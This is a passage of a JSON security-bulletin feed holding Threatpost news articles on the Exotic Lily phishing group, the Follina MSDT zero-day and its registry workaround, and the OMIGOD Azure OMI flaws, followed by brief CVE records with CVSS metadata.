\u2014 was sending more than 5,000 emails a day to as many as 650 targeted organizations globally, they said.\n\n\u201cUp until November 2021, the group seemed to be targeting specific industries such as IT, cybersecurity and healthcare, but as of late we have seen them attacking a wide variety of organizations and industries, with less specific focus,\u201d researchers wrote in the post.\n\n## **Soup to Nuts**\n\nExotic Lily works ostensibly as a full-time cybercrime business, which might be described as a \u201csoup to nuts\u201d organization if it were actually a legitimate company.\n\nThe group has maintained a \u201crelatively consistent attack chain\u201d during the time it was being tracked by researchers with its operators \u201cworking a fairly typical 9-to-5 job, with very little activity during the weekends,\u201d researchers wrote. Working hours indicated that the group is likely operating out of a Central or Eastern European time zone.\n\nThe group\u2019s tactics include initial activity to build fake online personas\u2014including social-media profiles with AI-generated photos\u2014that spoof both identities and company domains to ensure it appears as an authentic entity to its targets when carrying out phishing, researchers revealed.\n\nIn fact, in November, Google TAG observed the group impersonating real company employees by copying their personal data from social media and business databases such as RocketReach and CrunchBase.\n\n\u201cIn the majority of cases, a spoofed domain name was identical to a real domain name of an existing organization, with the only difference being a change of TLD to \u201c.us\u201d, \u201c.co\u201d or \u201c.biz,\u201d researchers wrote.\n\n## **Full-Time Phishing Business**\n\nWhile bug exploitation is part of its work as noted, Exotic Lily\u2019s main business operation is to use these spoofed email accounts to send [spear-phishing](<https://threatpost.com/spear-phishing-exploits-glitch-steal-credentials/176449/>) emails. They often purport to be a business proposal, such as seeking to outsource a software-development project or an information-security service.\n\nOne unique aspect of the group\u2019s method is to engage in more follow-up communications with targets than most cybercriminals behind phishing campaigns typically do, researchers observed. This activity includes operators\u2019 attempting to schedule a meeting to discuss a project\u2019s design or requirements or engaging in other communication to gain affinity and trust, they said.\n\nIn its final attack stage, Exotic Lily uploads an ultimate payload to a public file-sharing service such as TransferNow, TransferXL, WeTransfer or OneDrive, and then uses a built-in email notification feature to share the file with the target.\n\nThis tactic serves to help the group\u2019s malicious motives evade detection, as the final email originates from the email address of a legitimate file-sharing service and not the attacker\u2019s email, researchers noted.\n\n## **Payload Delivery**\n\nTypically, the actors upload another group\u2019s malware to the file-sharing service prior to sharing it with the target, researchers said. While some samples of malware appear custom, Google TAG doesn\u2019t think it\u2019s Exotic Lily who\u2019s developing these binaries.\n\nThough their first observation of the group was the use of documents exploiting the MSHTML bug, researchers later observed Exotic Lily changing its delivery tactics to use ISO archives that include shortcuts to the [BazarLoader dropper](<https://threatpost.com/bazarloader-malware-slack-basecamp/165455/>), according to the post.\n\nThis month, Google observed the group delivering ISO files with a custom loader that drops malware dubbed Bumblebee, which uses Windows Management Instrumentation (WMI) to collect various system details such as OS version, username and domain name. These details are then exfiltrated in JSON format to a command-and-control server (C2), researchers said.\n\nBumblebee also can execute commands and code from the C2, and in recent activity was seen fetching Cobalt Strike payloads to be executed on targeted systems, they added.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T14:49:01", "type": "threatpost", "title": "Google Blows Lid Off Conti, Diavol Ransomware Access-Broker Ops", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2021-44228"], "modified": "2022-03-18T14:49:01", "id": "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "href": "https://threatpost.com/google-conti-diavol-ransomware-access-broker/178981/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T16:46:30", "description": "Microsoft has released a workaround for [a zero-day flaw](<https://threatpost.com/zero-day-follina-bug-lays-older-microsoft-office-versions-open-to-attack/179756/>) that was initially flagged in April and that attackers already have used to target organizations in Russia and Tibet, researchers said.\n\nThe remote control execution (RCE) flaw, tracked as [CVE-2022-3019](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), is associated with the Microsoft Support Diagnostic Tool (MSDT), which, ironically, itself collects information about bugs in the company\u2019s products and reports to Microsoft Support.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 in [a bachelor\u2019s thesis from August 2020](<https://benjamin-altpeter.de/doc/thesis-electron.pdf>)\u2014with attackers apparently targeting Russian users\u2013and reported to Microsoft on April 21, according to research firm Recorded Future\u2019s [The Record](<https://therecord.media/microsoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet/>).\n\nA Malwarebytes Threat Intelligence analyst also spotted the flaw back in April but could not fully identify it, the company said [in a post on Twitter](<https://twitter.com/MBThreatIntel/status/1531398009103142912?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1531398009103142912%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Ftherecord.media%2Fmicrosoft-releases-guidance-for-office-zero-day-used-to-target-orgs-in-russia-india-tibet%2F>) over the weekend, retweeting the [original post](<https://twitter.com/h2jazi/status/1513870903590936586>) about the vulnerability, also made on April 12, from [@h2jazi](<https://twitter.com/h2jazi>).\n\nWhen the flaw was reported, Microsoft didn\u2019t consider it an issue. It\u2019s clear now that the company was wrong, and the vulnerability again raised the attention of researchers at Japanese security vendor Nao Sec, who[ tweeted a fresh warning](<https://twitter.com/nao_sec/status/1530196847679401984>) about it over the weekend, noting that it was being used to target users in Belarus.\n\nIn analysis over the weekend noted security researcher Kevin Beaumont [dubbed the vulnerability](<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e>) \u201cFollina,\u201d explaining the zero-day code references the Italy-based area code of Follina \u2013 0438.\n\n## **Current Workaround**\n\nWhile no patch yet exists for the flaw, Microsoft is recommending that affected users disable the MSDT URL to mitigate it for now. This \u201cprevents troubleshooters being launched as links including links throughout the operating system,\u201d the company wrote in their advisory.\n\nTo do this, users must follow these steps: Run \u201c:**Command Prompt**** as Administrator****\u201c**; Back up the registry key by executing the command \u201creg export HKEY_CLASSES_ROOT\\ms-msdt _filename_\u201c; and execute the command \u201creg delete HKEY_CLASSES_ROOT\\ms-msdt /f\u201d.\n\n\u201cTroubleshooters can still be accessed using the [Get Help application](<https://apps.microsoft.com/store/detail/get-help/9PKDZBMV1H3T?hl=en-us&gl=US>) and in system settings as other or additional troubleshooters,\u201d the company said.\n\nMoreover, if the calling application is an Office app then by default, Office opens the document from the internet in Protected View and Application Guard for Office, \u201cboth of which prevent the current attack,\u201d Microsoft said. However, Beaumont refuted that assurance in his analysis of the bug.\n\nMicrosoft also plans to update CVE-2022-3019 with further information but did not specify when it would do so, according to the advisory.\n\n## **Significant Risk**\n\nIn the meantime, the unpatched flaw poses a significant risk for a number of reasons, Beaumont and other researchers noted.\n\nOne is that it affects such a wide swathe of users, given that it exists in all currently supported Windows versions and can be exploited via Microsoft Office versions 2013 through Office 2019, Office 2021, Office 365, and Office ProPlus.\n\n\u201cEvery organization that is dealing with content, files and in particular Office documents, which is basically everyone in the globe, is currently exposed to this threat,\u201d Aviv Grafi, CTO and founder of security firm [Votiro](<https://votiro.com/>), wrote in an e-mail to Threatpost.\n\nAnother reason the flaw poses a major threat is its execution without action from end users, both Beaumont and Grafi said. Once the HTML is loaded from the calling application, an MSDT scheme is used to execute a PowerShell code to run a malicious payload, Grafi explained.\n\nSince the flaw is abusing the remote template feature in Microsoft Word, it is not dependent on a typical macro-based exploit path, which are common within Office-based attacks, Beaumont said.\n\n\u201cWhat makes this vulnerability so difficult to avoid is the fact that the end user does not have to enable macros for the code to execute, making it a \u2018zero-click\u2019 remote code execution technique used through MSDT,\u201d Grafi concurred.\n\n## **Under Active Attack**\n\nClaire Tills, senior research engineer for security firm Tenable, compared the flaw to last year\u2019s zero-click [MSHTML bug](<https://threatpost.com/microsoft-zero-day-rce-flaw-in-windows/169273/>)**, **tracked as [CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>), which was pummeled by attackers, including the [Ryuk ransomware gang](<https://threatpost.com/microsoft-mshtml-ryuk-ransomware/174780/>).\n\n\u201cGiven the similarities between CVE-2022-30190 and CVE-2021-40444, and that researchers speculate other protocol handlers may also be vulnerable, we expect to see further developments and exploitation attempts of this issue,\u201d she wrote in an e-mail to Threatpost.\n\nIndeed, threat actors already have pounced on the vulnerability. On Monday, Proofpoint Threat Insight also [tweeted](<https://twitter.com/threatinsight/status/1531688214993555457>) that threat actors were using the flaw to target organizations in Tibet by impersonating the \u201cWomen Empowerments Desk\u201d of the Central Tibetan Administration.\n\nWhat\u2019s more, the workaround that Microsoft currently offers itself has issues and won\u2019t provide much of a fix in the long-term, especially with the bug under attack, Grafi said. He said the workaround is\u201dnot friendly for admins\u201d because it involves \u201cchanges in the Registry of the end user\u2019s endpoints.\u201d\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T10:38:37", "type": "threatpost", "title": "Microsoft Releases Workaround for \u2018One-Click\u2019 0Day Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-3019", "CVE-2022-30190"], "modified": "2022-06-01T10:38:37", "id": "THREATPOST:4C8D995307A845304CF691725B2352A2", "href": "https://threatpost.com/microsoft-workaround-0day-attack/179776/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-16T15:56:08", "description": "Four Microsoft zero-day vulnerabilities in the Azure cloud platform\u2019s Open Management Infrastructure (OMI) \u2014 a software that many don\u2019t know is embedded in a host of services \u2014 show that OMI represents a significant security blind spot, researchers said.\n\nCollectively dubbed \u201cOMIGOD\u201d because of the name and the reaction of the researchers who discovered them, the flaws \u2014 which were zero-day when found \u2014 affect thousands of Azure customers and millions of endpoints, according to a [blog post](<https://www.wiz.io/blog/secret-agent-exposes-azure-customers-to-unauthorized-code-execution>) published this week by cloud infrastructure security firm Wiz.\n\nThough Microsoft patched them this week in its [monthly Patch Tuesday](<https://threatpost.com/microsoft-patch-tuesday-exploited-windows-zero-day/169459/>) raft of updates, their presence in OMI highlights the risk for the supply chain when companies unknowingly run code \u2014 particularly open-source code \u2014 on their systems that allows for exploitation, researchers said.\n\n[![Infosec Insiders Newsletter](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/10165815/infosec_insiders_in_article_promo.png)](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nIndeed, recent high-profile supply-chain attacks such as [SolarWinds](<https://threatpost.com/solarwinds-attackers-dhs-emails/165110/>) and [Kaseya](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) demonstrate how much damage can be done when undetected flaws in third-party software that organizations use in larger systems are exploited.\n\n\u201cOne of the biggest challenges in preventing them is that our digital supply chain is not transparent,\u201d senior security researcher Nir Ohfeld wrote in the Wiz post. \u201cIf you don\u2019t know what\u2019s hidden in the services and products you use every day, how can you manage the risk?\n\nIndeed, the OMIGOD vulnerabilities discovered by Ohfeld and his colleagues present a security danger to potentially millions of unsuspecting customers of cloud computing services, he said.\n\n\u201cIn a small sample of Azure tenants we analyzed, over 65 percent [of Azure customers] were unknowingly at risk,\u201d Ohfeld wrote.\n\nThe vulnerabilities that Wiz researchers discovered include one that allows for remote code execution (RCE), [CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>). The other three are privilege-escalation vulnerabilities ([CVE-2021-38648](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648>), [CVE-2021-38645](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38645>) and [CVE-2021-38649)](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38649>) of lower risk but which are critical for a full attack chain.\n\n\u201cUnless a patch is applied, attackers can easily exploit these four vulnerabilities to escalate to root privileges and remotely execute malicious code (for instance, encrypting files for ransom),\u201d Ohfeld said.\n\n## **Hidden Cloud Security Danger in OMI**\n\nOne reason for the significant alarm over the flaws is that they are found in OMI, an agent automatically deployed when customers set up a Linux virtual machine (VM) in their cloud and enable certain Azure services, researchers explained.\n\n\u201cThis happens without customers\u2019 explicit consent or knowledge,\u201d Ohfeld wrote. \u201cUsers simply click \u2018agree\u2019 to log collection during setup, and they have unknowingly opted in.\u201d\n\nOMI is a perilous attack surface because Azure provides \u201cvirtually no public documentation\u201d about it, he said. That means most customers have never heard of it and are unaware that it even exists as an exploitable entity in their deployment.\n\nMoreover, the OMI agent runs as root with the highest privileges, so any user can communicate with it using a UNIX socket or via an HTTP API when configured to allow external access, Ohfeld explained.\n\n\u201cAs a result, the vulnerabilities we found would allow external users or low-privileged users to remotely execute code on target machines or escalate privileges,\u201d he wrote.\n\n## **\u2018Textbook RCE Vulnerability\u201d**\n\n** **[CVE-2021-38647](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647>), with a 9.8 severity rating, is the most serious of the flaws, allowing for RCE. However, for it to be exploited, the Azure product using OMI would have to be one, such as Configuration Management, that exposes an HTTPS port, or port 5986, for interacting with OMI.\n\n\u201cThat\u2019s what makes RCE possible,\u201d Ohfeld explained. \u201cNote that most Azure services that use OMI deploy it without exposing the HTTPS port.\u201d\n\nCalling the bug \u201ca textbook RCE vulnerability that you would expect to see in the 90s\u201d not in 2021, the flaw can expose millions of endpoints because \u201can attacker could use a single packet to become root on a remote machine by simply removing the authentication header,\u201d Ohfeld wrote.\n\n\u201cThanks to the combination of a simple conditional statement coding mistake and an uninitialized auth struct, any request without an Authorization header has its privileges default to uid=0, gid=0, which is root,\u201d he explained.\n\nIn situations where the OMI ports are accessible to the internet to allow for remote management, threat actors can use the vulnerability co-obtain initial access to a target Azure environment and then move laterally within it, Ohfeld added.\n\n\u201cAn exposed HTTPS port is the holy grail for malicious actors,\u201d he observed. \u201cWith one simple exploit they can get access to new targets, execute commands at the highest privileges and possibly spread to new target machines.\u201d\n\nThe other three flaws\u2014with severity ratings that range from 7.1 to 7.8\u2014can be used as part of attack chains once attackers gain initial low-privileged access to their targets, Ohfeld added.\n\n## **Threat Discovery and Mitigations**\n\nWiz researchers reported the four vulnerabilities to Microsoft through the responsible disclosure process; the company patched them as of Tuesday, researchers said.\n\nUpgrading OMI and thus patch installation happens through the parent Azure service that installed it, they added. \u201cHowever, we urge customers to verify that their environment is indeed patched and they are running the latest version of OMI (Version 1.6.8.1),\u201d Ohfeld wrote.\n\nDifferent Azure services have different port numbers, Microsoft noted in its advisory for CVE-2021-38647. However, for customers who want to check that their Azure Linux Node does not have an exposed port, they should look for the command \u2018_netstat -an | grep <port-number>_\u2018 on most Linux distributions, which will indicate if any processes are listening on an open port, the company said.\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. **[JOIN](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)** Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the **[4 Golden Rules of Linux Security](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)**. Your top takeaway will be a Linux roadmap to getting the basics right! **[REGISTER NOW](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) **and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-16T11:37:48", "type": "threatpost", "title": "Azure Zero-Day Bugs Show Lurking Supply-Chain Risk", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2021-09-16T11:37:48", "id": "THREATPOST:FD28EAD589B45A1A4A7412632B25CEAB", "href": "https://threatpost.com/azure-zero-day-supply-chain/169508/", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-08-16T07:11:24", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40447", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:41:00", "id": "PRION:CVE-2021-40447", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:39", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38667", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:53:00", "id": "PRION:CVE-2021-38667", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:38", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38671", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-24T18:52:00", "id": "PRION:CVE-2021-38671", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:31", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36975", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:08:00", "id": "PRION:CVE-2021-36975", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:32", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38639", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-26T21:31:00", "id": "PRION:CVE-2021-38639", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:37", "description": "Microsoft Office Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38659", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38659"], "modified": "2021-09-24T19:03:00", "id": "PRION:CVE-2021-38659", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38659", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:26", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36965", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "id": "PRION:CVE-2021-36965", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:35:18", "description": "Visual Studio Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": 